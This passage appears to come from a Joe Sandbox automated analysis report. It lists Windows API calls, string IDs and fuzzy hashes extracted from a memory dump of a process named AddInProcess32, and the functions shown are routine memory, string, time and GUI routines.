                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2754987064-0
                                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                  APIs
                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 764393265-0
                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                  APIs
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                  • String ID:
                                                                                                  • API String ID: 979780441-0
                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                  • String ID:
                                                                                                  • API String ID: 1386444988-0
                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                  • String ID: "
                                                                                                  • API String ID: 1983396471-123907689
                                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                  APIs
                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2789212964-323797159
                                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf
                                                                                                  • String ID: %%-%d.%ds
                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendmemset
                                                                                                  • String ID: F^@
                                                                                                  • API String ID: 568519121-3652327722
                                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PlacementWindowmemset
                                                                                                  • String ID: WinPos
                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                  • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                  • memset.MSVCRT ref: 0042BAAE
                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 438689982-0
                                                                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1860491036-0
                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                  APIs
                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 726966127-0
                                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                  APIs
                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 726966127-0
                                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                  APIs
                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3669619086-0
                                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605342592-0
                                                                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5